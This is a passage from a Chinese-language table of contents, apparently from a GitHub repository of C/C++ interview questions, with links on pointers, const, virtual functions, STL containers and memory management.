引用和指针的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#74%E5%BC%95%E7%94%A8%E5%92%8C%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [3.1.2 从汇编层去解释一下引用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#75%E4%BB%8E%E6%B1%87%E7%BC%96%E5%B1%82%E5%8E%BB%E8%A7%A3%E9%87%8A%E4%B8%80%E4%B8%8B%E5%BC%95%E7%94%A8) ##### [3.1.3 
C++中的指针参数传递和引用参数传递](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#76c%E4%B8%AD%E7%9A%84%E6%8C%87%E9%92%88%E5%8F%82%E6%95%B0%E4%BC%A0%E9%80%92%E5%92%8C%E5%BC%95%E7%94%A8%E5%8F%82%E6%95%B0%E4%BC%A0%E9%80%92) ##### [3.1.4 形参与实参的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#77%E5%BD%A2%E5%8F%82%E4%B8%8E%E5%AE%9E%E5%8F%82%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [3.1.5 static的用法和作用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#78static%E7%9A%84%E7%94%A8%E6%B3%95%E5%92%8C%E4%BD%9C%E7%94%A8) ##### [3.1.6 静态变量什么时候初始化](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#79%E9%9D%99%E6%80%81%E5%8F%98%E9%87%8F%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E5%88%9D%E5%A7%8B%E5%8C%96) ##### [3.1.7 const?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#80const) ##### [3.1.8 const成员函数的理解和应用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#81const%E6%88%90%E5%91%98%E5%87%BD%E6%95%B0%E7%9A%84%E7%90%86%E8%A7%A3%E5%92%8C%E5%BA%94%E7%94%A8) ##### [3.1.9 指针和const的用法](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#82%E6%8C%87%E9%92%88%E5%92%8Cconst%E7%9A%84%E7%94%A8%E6%B3%95) ##### [3.2.0 mutable](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#83mutable) ##### [3.2.1 extern用法?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#84extern%E7%94%A8%E6%B3%95) ##### [3.2.2 int转字符串字符串转int?strcat,strcpy,strncpy,memset,memcpy的内部实现?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#85int%E8%BD%AC%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%BD%ACintstrcatstrcpystrncpymemsetmemcpy%E7%9A%84%E5%86%85%E9%83%A8%E5%AE%9E%E7%8E%B0) ##### [3.2.3 深拷贝与浅拷贝?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#86%E6%B7%B1%E6%8B%B7%E8%B4%9D%E4%B8%8E%E6%B5%85%E6%8B%B7%E8%B4%9D) ##### [3.2.4 C++模板是什么,底层怎么实现的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#87c%E6%A8%A1%E6%9D%BF%E6%98%AF%E4%BB%80%E4%B9%88%E5%BA%95%E5%B1%82%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0%E7%9A%84) ##### [3.2.5 C语言struct和C++struct区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#88c%E8%AF%AD%E8%A8%80struct%E5%92%8Ccstruct%E5%8C%BA%E5%88%AB) ##### [3.2.6 虚函数可以声明为inline吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#89%E8%99%9A%E5%87%BD%E6%95%B0%E5%8F%AF%E4%BB%A5%E5%A3%B0%E6%98%8E%E4%B8%BAinline%E5%90%97) ##### [3.2.7 类成员初始化方式?构造函数的执行顺序 ?为什么用成员初始化列表会快一些?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#90%E7%B1%BB%E6%88%90%E5%91%98%E5%88%9D%E5%A7%8B%E5%8C%96%E6%96%B9%E5%BC%8F%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E7%9A%84%E6%89%A7%E8%A1%8C%E9%A1%BA%E5%BA%8F-%E4%B8%BA%E4%BB%80%E4%B9%88%E7%94%A8%E6%88%90%E5%91%98%E5%88%9D%E5%A7%8B%E5%8C%96%E5%88%97%E8%A1%A8%E4%BC%9A%E5%BF%AB%E4%B8%80%E4%BA%9B) ##### [3.2.8 成员列表初始化?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#91%E6%88%90%E5%91%98%E5%88%97%E8%A1%A8%E5%88%9D%E5%A7%8B%E5%8C%96) ##### [3.2.9 
构造函数为什么不能为虚函数?析构函数为什么要虚函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#92%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E4%B8%8D%E8%83%BD%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E8%99%9A%E5%87%BD%E6%95%B0) ##### [3.3.0 析构函数的作用,如何起作用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#93%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E7%9A%84%E4%BD%9C%E7%94%A8%E5%A6%82%E4%BD%95%E8%B5%B7%E4%BD%9C%E7%94%A8) ##### [3.3.1 构造函数和析构函数可以调用虚函数吗,为什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#94%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%92%8C%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E5%8F%AF%E4%BB%A5%E8%B0%83%E7%94%A8%E8%99%9A%E5%87%BD%E6%95%B0%E5%90%97%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [3.3.2 构造函数的执行顺序?析构函数的执行顺序?构造函数内部干了啥?拷贝构造干了啥?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#95%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E7%9A%84%E6%89%A7%E8%A1%8C%E9%A1%BA%E5%BA%8F%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E7%9A%84%E6%89%A7%E8%A1%8C%E9%A1%BA%E5%BA%8F%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%86%85%E9%83%A8%E5%B9%B2%E4%BA%86%E5%95%A5%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%B9%B2%E4%BA%86%E5%95%A5) ##### [3.3.3 虚析构函数的作用,父类的析构函数是否要设置为虚函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#96%E8%99%9A%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E7%9A%84%E4%BD%9C%E7%94%A8%E7%88%B6%E7%B1%BB%E7%9A%84%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E6%98%AF%E5%90%A6%E8%A6%81%E8%AE%BE%E7%BD%AE%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0) ##### [3.3.4 构造函数析构函数可否抛出异常](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#97%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E5%8F%AF%E5%90%A6%E6%8A%9B%E5%87%BA%E5%BC%82%E5%B8%B8) ##### [3.3.5 类如何实现只能静态分配和只能动态分配](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#98%E7%B1%BB%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E5%8F%AA%E8%83%BD%E9%9D%99%E6%80%81%E5%88%86%E9%85%8D%E5%92%8C%E5%8F%AA%E8%83%BD%E5%8A%A8%E6%80%81%E5%88%86%E9%85%8D) ##### [3.3.6 如果想将某个类用作基类,为什么该类必须定义而非声明?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#99%E5%A6%82%E6%9E%9C%E6%83%B3%E5%B0%86%E6%9F%90%E4%B8%AA%E7%B1%BB%E7%94%A8%E4%BD%9C%E5%9F%BA%E7%B1%BB%E4%B8%BA%E4%BB%80%E4%B9%88%E8%AF%A5%E7%B1%BB%E5%BF%85%E9%A1%BB%E5%AE%9A%E4%B9%89%E8%80%8C%E9%9D%9E%E5%A3%B0%E6%98%8E) ##### [3.3.7 什么情况会自动生成默认构造函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#100%E4%BB%80%E4%B9%88%E6%83%85%E5%86%B5%E4%BC%9A%E8%87%AA%E5%8A%A8%E7%94%9F%E6%88%90%E9%BB%98%E8%AE%A4%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0) ##### [3.3.8 什么是类的继承?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#101%E4%BB%80%E4%B9%88%E6%98%AF%E7%B1%BB%E7%9A%84%E7%BB%A7%E6%89%BF) ##### [3.3.9 什么是组合?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#102%E4%BB%80%E4%B9%88%E6%98%AF%E7%BB%84%E5%90%88) ##### [3.4.0 抽象基类为什么不能创建对象?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#103%E6%8A%BD%E8%B1%A1%E5%9F%BA%E7%B1%BB%E4%B8%BA%E4%BB%80%E4%B9%88%E4%B8%8D%E8%83%BD%E5%88%9B%E5%BB%BA%E5%AF%B9%E8%B1%A1) ##### [3.4.1 类什么时候会析构?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#104%E7%B1%BB%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E4%BC%9A%E6%9E%90%E6%9E%84) ##### [3.4.2 
为什么友元函数必须在类内部声明?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#105%E4%B8%BA%E4%BB%80%E4%B9%88%E5%8F%8B%E5%85%83%E5%87%BD%E6%95%B0%E5%BF%85%E9%A1%BB%E5%9C%A8%E7%B1%BB%E5%86%85%E9%83%A8%E5%A3%B0%E6%98%8E) ##### [3.4.3 介绍一下C++里面的多态?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#106%E4%BB%8B%E7%BB%8D%E4%B8%80%E4%B8%8Bc%E9%87%8C%E9%9D%A2%E7%9A%84%E5%A4%9A%E6%80%81) ##### [3.4.4 用C语言实现C++的继承](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#107%E7%94%A8c%E8%AF%AD%E8%A8%80%E5%AE%9E%E7%8E%B0c%E7%9A%84%E7%BB%A7%E6%89%BF) ##### [3.4.5 继承机制中对象之间如何转换?指针和引用之间如何转换?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#108%E7%BB%A7%E6%89%BF%E6%9C%BA%E5%88%B6%E4%B8%AD%E5%AF%B9%E8%B1%A1%E4%B9%8B%E9%97%B4%E5%A6%82%E4%BD%95%E8%BD%AC%E6%8D%A2%E6%8C%87%E9%92%88%E5%92%8C%E5%BC%95%E7%94%A8%E4%B9%8B%E9%97%B4%E5%A6%82%E4%BD%95%E8%BD%AC%E6%8D%A2) ##### [3.4.6 组合与继承优缺点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#109%E7%BB%84%E5%90%88%E4%B8%8E%E7%BB%A7%E6%89%BF%E4%BC%98%E7%BC%BA%E7%82%B9) ##### [3.4.7 左值右值](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#110%E5%B7%A6%E5%80%BC%E5%8F%B3%E5%80%BC) ##### [3.4.8 移动构造函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#111%E7%A7%BB%E5%8A%A8%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0) ##### [3.4.9 C语言的编译链接过程?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#112c%E8%AF%AD%E8%A8%80%E7%9A%84%E7%BC%96%E8%AF%91%E9%93%BE%E6%8E%A5%E8%BF%87%E7%A8%8B) ##### [3.5.0 vector与list的区别与应用?怎么找某vector或者list的倒数第二个元素](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#113vector%E4%B8%8Elist%E7%9A%84%E5%8C%BA%E5%88%AB%E4%B8%8E%E5%BA%94%E7%94%A8%E6%80%8E%E4%B9%88%E6%89%BE%E6%9F%90vector%E6%88%96%E8%80%85list%E7%9A%84%E5%80%92%E6%95%B0%E7%AC%AC%E4%BA%8C%E4%B8%AA%E5%85%83%E7%B4%A0) ##### [3.5.1 STL vector的实现,删除其中的元素,迭代器如何变化?为什么是两倍扩容?释放空间?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#114stl-vector%E7%9A%84%E5%AE%9E%E7%8E%B0%E5%88%A0%E9%99%A4%E5%85%B6%E4%B8%AD%E7%9A%84%E5%85%83%E7%B4%A0%E8%BF%AD%E4%BB%A3%E5%99%A8%E5%A6%82%E4%BD%95%E5%8F%98%E5%8C%96%E4%B8%BA%E4%BB%80%E4%B9%88%E6%98%AF%E4%B8%A4%E5%80%8D%E6%89%A9%E5%AE%B9%E9%87%8A%E6%94%BE%E7%A9%BA%E9%97%B4) ##### [3.5.2 容器内部删除一个元素](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#115%E5%AE%B9%E5%99%A8%E5%86%85%E9%83%A8%E5%88%A0%E9%99%A4%E4%B8%80%E4%B8%AA%E5%85%83%E7%B4%A0) ##### [3.5.3 STL迭代器如何实现](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#116stl%E8%BF%AD%E4%BB%A3%E5%99%A8%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0) ##### [3.5.4 set与hash_set的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#117set%E4%B8%8Ehash_set%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [3.5.5 hashmap与map的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#118hashmap%E4%B8%8Emap%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [3.5.6 map、set是怎么实现的,红黑树是怎么能够同时实现这两种容器? 
为什么使用红黑树?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#119mapset%E6%98%AF%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0%E7%9A%84%E7%BA%A2%E9%BB%91%E6%A0%91%E6%98%AF%E6%80%8E%E4%B9%88%E8%83%BD%E5%A4%9F%E5%90%8C%E6%97%B6%E5%AE%9E%E7%8E%B0%E8%BF%99%E4%B8%A4%E7%A7%8D%E5%AE%B9%E5%99%A8-%E4%B8%BA%E4%BB%80%E4%B9%88%E4%BD%BF%E7%94%A8%E7%BA%A2%E9%BB%91%E6%A0%91) ##### [3.5.7 如何在共享内存上使用stl标准库?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#120%E5%A6%82%E4%BD%95%E5%9C%A8%E5%85%B1%E4%BA%AB%E5%86%85%E5%AD%98%E4%B8%8A%E4%BD%BF%E7%94%A8stl%E6%A0%87%E5%87%86%E5%BA%93) <br> <h3 id="4">腾讯篇</h3> --- ##### [4.1.0 map插入方式有几种?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#121map%E6%8F%92%E5%85%A5%E6%96%B9%E5%BC%8F%E6%9C%89%E5%87%A0%E7%A7%8D) ##### [4.1.1 STL中unordered_map(hash_map)和map的区别,hash_map如何解决冲突以及扩容](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#122stl%E4%B8%ADunordered_maphash_map%E5%92%8Cmap%E7%9A%84%E5%8C%BA%E5%88%ABhash_map%E5%A6%82%E4%BD%95%E8%A7%A3%E5%86%B3%E5%86%B2%E7%AA%81%E4%BB%A5%E5%8F%8A%E6%89%A9%E5%AE%B9) ##### [4.1.2 vector越界访问下标,map越界访问下标?vector删除元素时会不会释放空间?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#123vector%E8%B6%8A%E7%95%8C%E8%AE%BF%E9%97%AE%E4%B8%8B%E6%A0%87map%E8%B6%8A%E7%95%8C%E8%AE%BF%E9%97%AE%E4%B8%8B%E6%A0%87vector%E5%88%A0%E9%99%A4%E5%85%83%E7%B4%A0%E6%97%B6%E4%BC%9A%E4%B8%8D%E4%BC%9A%E9%87%8A%E6%94%BE%E7%A9%BA%E9%97%B4) ##### [4.1.3 map[]与find的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#124map%E4%B8%8Efind%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.1.4 STL中list与queue之间的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#125stl%E4%B8%ADlist%E4%B8%8Equeue%E4%B9%8B%E9%97%B4%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.1.5 STL中的allocator,deallocator](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#126stl%E4%B8%AD%E7%9A%84allocatordeallocator) ##### [4.1.6 STL中hash_map扩容发生什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#127stl%E4%B8%ADhash_map%E6%89%A9%E5%AE%B9%E5%8F%91%E7%94%9F%E4%BB%80%E4%B9%88) ##### [4.1.7 map如何创建?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#128map%E5%A6%82%E4%BD%95%E5%88%9B%E5%BB%BA) ##### [4.1.8 vector的增加删除都是怎么做的?为什么是1.5倍?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#129vector%E7%9A%84%E5%A2%9E%E5%8A%A0%E5%88%A0%E9%99%A4%E9%83%BD%E6%98%AF%E6%80%8E%E4%B9%88%E5%81%9A%E7%9A%84%E4%B8%BA%E4%BB%80%E4%B9%88%E6%98%AF15%E5%80%8D) ##### [4.1.9 函数指针?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#130%E5%87%BD%E6%95%B0%E6%8C%87%E9%92%88) ##### [4.2.0 说说你对c和c++的看法,c和c++的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#131%E8%AF%B4%E8%AF%B4%E4%BD%A0%E5%AF%B9c%E5%92%8Cc%E7%9A%84%E7%9C%8B%E6%B3%95c%E5%92%8Cc%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.2.1 c/c++的内存分配,详细说一下栈、堆、静态存储区?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#132cc%E7%9A%84%E5%86%85%E5%AD%98%E5%88%86%E9%85%8D%E8%AF%A6%E7%BB%86%E8%AF%B4%E4%B8%80%E4%B8%8B%E6%A0%88%E5%A0%86%E9%9D%99%E6%80%81%E5%AD%98%E5%82%A8%E5%8C%BA) ##### [4.2.2 堆与栈的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#133%E5%A0%86%E4%B8%8E%E6%A0%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.2.3 
野指针是什么?如何检测内存泄漏?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#134%E9%87%8E%E6%8C%87%E9%92%88%E6%98%AF%E4%BB%80%E4%B9%88%E5%A6%82%E4%BD%95%E6%A3%80%E6%B5%8B%E5%86%85%E5%AD%98%E6%B3%84%E6%BC%8F) ##### [4.2.4 悬空指针和野指针有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#135%E6%82%AC%E7%A9%BA%E6%8C%87%E9%92%88%E5%92%8C%E9%87%8E%E6%8C%87%E9%92%88%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [4.2.5 内存泄漏](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#136%E5%86%85%E5%AD%98%E6%B3%84%E6%BC%8F) ##### [4.2.6 new和malloc的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#137new%E5%92%8Cmalloc%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.2.7 delete p;与delete[]p,allocator](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#138delete-p%E4%B8%8Edeletepallocator) ##### [4.2.8 new和delete的实现原理, delete是如何知道释放内存的大小的额?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#139new%E5%92%8Cdelete%E7%9A%84%E5%AE%9E%E7%8E%B0%E5%8E%9F%E7%90%86-delete%E6%98%AF%E5%A6%82%E4%BD%95%E7%9F%A5%E9%81%93%E9%87%8A%E6%94%BE%E5%86%85%E5%AD%98%E7%9A%84%E5%A4%A7%E5%B0%8F%E7%9A%84%E9%A2%9D) ##### [4.2.9 malloc申请的存储空间能用delete释放吗](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#140malloc%E7%94%B3%E8%AF%B7%E7%9A%84%E5%AD%98%E5%82%A8%E7%A9%BA%E9%97%B4%E8%83%BD%E7%94%A8delete%E9%87%8A%E6%94%BE%E5%90%97) ##### [4.3.0 malloc与free的实现原理?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#141malloc%E4%B8%8Efree%E7%9A%84%E5%AE%9E%E7%8E%B0%E5%8E%9F%E7%90%86) ##### [4.3.1 malloc、realloc、calloc的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#142mallocrealloccalloc%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.3.2 __stdcall和__cdecl的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#143__stdcall%E5%92%8C__cdecl%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.3.3 使用智能指针管理内存资源,RAII](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#144%E4%BD%BF%E7%94%A8%E6%99%BA%E8%83%BD%E6%8C%87%E9%92%88%E7%AE%A1%E7%90%86%E5%86%85%E5%AD%98%E8%B5%84%E6%BA%90raii) ##### [4.3.4 手写实现智能指针类](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#145%E6%89%8B%E5%86%99%E5%AE%9E%E7%8E%B0%E6%99%BA%E8%83%BD%E6%8C%87%E9%92%88%E7%B1%BB) ##### [4.3.5 内存对齐?位域?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#146%E5%86%85%E5%AD%98%E5%AF%B9%E9%BD%90%E4%BD%8D%E5%9F%9F) ##### [4.3.6 结构体变量比较是否相等](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#147%E7%BB%93%E6%9E%84%E4%BD%93%E5%8F%98%E9%87%8F%E6%AF%94%E8%BE%83%E6%98%AF%E5%90%A6%E7%9B%B8%E7%AD%89) ##### [4.3.7 位运算](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#148%E4%BD%8D%E8%BF%90%E7%AE%97) ##### [4.3.8 为什么内存对齐](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#149%E4%B8%BA%E4%BB%80%E4%B9%88%E5%86%85%E5%AD%98%E5%AF%B9%E9%BD%90) ##### [4.3.9 函数调用过程栈的变化,返回值和参数变量哪个先入栈?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#150%E5%87%BD%E6%95%B0%E8%B0%83%E7%94%A8%E8%BF%87%E7%A8%8B%E6%A0%88%E7%9A%84%E5%8F%98%E5%8C%96%E8%BF%94%E5%9B%9E%E5%80%BC%E5%92%8C%E5%8F%82%E6%95%B0%E5%8F%98%E9%87%8F%E5%93%AA%E4%B8%AA%E5%85%88%E5%85%A5%E6%A0%88) ##### [4.4.0 
怎样判断两个浮点数是否相等?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#151%E6%80%8E%E6%A0%B7%E5%88%A4%E6%96%AD%E4%B8%A4%E4%B8%AA%E6%B5%AE%E7%82%B9%E6%95%B0%E6%98%AF%E5%90%A6%E7%9B%B8%E7%AD%89) ##### [4.4.1 宏定义一个取两个数中较大值的功能](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#152%E5%AE%8F%E5%AE%9A%E4%B9%89%E4%B8%80%E4%B8%AA%E5%8F%96%E4%B8%A4%E4%B8%AA%E6%95%B0%E4%B8%AD%E8%BE%83%E5%A4%A7%E5%80%BC%E7%9A%84%E5%8A%9F%E8%83%BD) ##### [4.4.2 define、const、typedef、inline使用方法?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#153defineconsttypedefinline%E4%BD%BF%E7%94%A8%E6%96%B9%E6%B3%95) ##### [4.4.3 printf实现原理?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#154printf%E5%AE%9E%E7%8E%B0%E5%8E%9F%E7%90%86) ##### [4.4.4 #include 的顺序以及尖括号和双引号的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#155include-%E7%9A%84%E9%A1%BA%E5%BA%8F%E4%BB%A5%E5%8F%8A%E5%B0%96%E5%8F%AB%E6%8B%AC%E5%8F%B7%E5%92%8C%E5%8F%8C%E5%BC%95%E5%8F%B7%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.4.5 lambda函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#156lambda%E5%87%BD%E6%95%B0) ##### [4.4.6 hello world 程序开始到打印到屏幕上的全过程?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#157hello-world-%E7%A8%8B%E5%BA%8F%E5%BC%80%E5%A7%8B%E5%88%B0%E6%89%93%E5%8D%B0%E5%88%B0%E5%B1%8F%E5%B9%95%E4%B8%8A%E7%9A%84%E5%85%A8%E8%BF%87%E7%A8%8B) ##### [4.4.7 模板类和模板函数的区别是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#158%E6%A8%A1%E6%9D%BF%E7%B1%BB%E5%92%8C%E6%A8%A1%E6%9D%BF%E5%87%BD%E6%95%B0%E7%9A%84%E5%8C%BA%E5%88%AB%E6%98%AF%E4%BB%80%E4%B9%88) ##### [4.4.8 为什么模板类一般都是放在一个h文件中](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#159%E4%B8%BA%E4%BB%80%E4%B9%88%E6%A8%A1%E6%9D%BF%E7%B1%BB%E4%B8%80%E8%88%AC%E9%83%BD%E6%98%AF%E6%94%BE%E5%9C%A8%E4%B8%80%E4%B8%AAh%E6%96%87%E4%BB%B6%E4%B8%AD) ##### [4.4.9 C++中类成员的访问权限和继承权限问题。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#160c%E4%B8%AD%E7%B1%BB%E6%88%90%E5%91%98%E7%9A%84%E8%AE%BF%E9%97%AE%E6%9D%83%E9%99%90%E5%92%8C%E7%BB%A7%E6%89%BF%E6%9D%83%E9%99%90%E9%97%AE%E9%A2%98) ##### [4.5.0 cout和printf有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#161cout%E5%92%8Cprintf%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [4.5.1 重载运算符?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#162%E9%87%8D%E8%BD%BD%E8%BF%90%E7%AE%97%E7%AC%A6) ##### [4.5.2 函数重载函数匹配原则](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#163%E5%87%BD%E6%95%B0%E9%87%8D%E8%BD%BD%E5%87%BD%E6%95%B0%E5%8C%B9%E9%85%8D%E5%8E%9F%E5%88%99) ##### [4.5.3 定义和声明的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#164%E5%AE%9A%E4%B9%89%E5%92%8C%E5%A3%B0%E6%98%8E%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.5.4 C++类型转换有四种](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#165c%E7%B1%BB%E5%9E%8B%E8%BD%AC%E6%8D%A2%E6%9C%89%E5%9B%9B%E7%A7%8D) ##### [4.5.5 全局变量和static变量的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#166%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E5%92%8Cstatic%E5%8F%98%E9%87%8F%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.5.6 
静态成员与普通成员的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#167%E9%9D%99%E6%80%81%E6%88%90%E5%91%98%E4%B8%8E%E6%99%AE%E9%80%9A%E6%88%90%E5%91%98%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.5.7 说一下理解 ifdef endif](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#168%E8%AF%B4%E4%B8%80%E4%B8%8B%E7%90%86%E8%A7%A3-ifdef-endif) ##### [4.5.8 隐式转换,如何消除隐式转换?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#169%E9%9A%90%E5%BC%8F%E8%BD%AC%E6%8D%A2%E5%A6%82%E4%BD%95%E6%B6%88%E9%99%A4%E9%9A%90%E5%BC%8F%E8%BD%AC%E6%8D%A2) ##### [4.5.9 多继承的优缺点,作为一个开发者怎么看待多继承](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#171%E5%A4%9A%E7%BB%A7%E6%89%BF%E7%9A%84%E4%BC%98%E7%BC%BA%E7%82%B9%E4%BD%9C%E4%B8%BA%E4%B8%80%E4%B8%AA%E5%BC%80%E5%8F%91%E8%80%85%E6%80%8E%E4%B9%88%E7%9C%8B%E5%BE%85%E5%A4%9A%E7%BB%A7%E6%89%BF) ##### [4.6.0 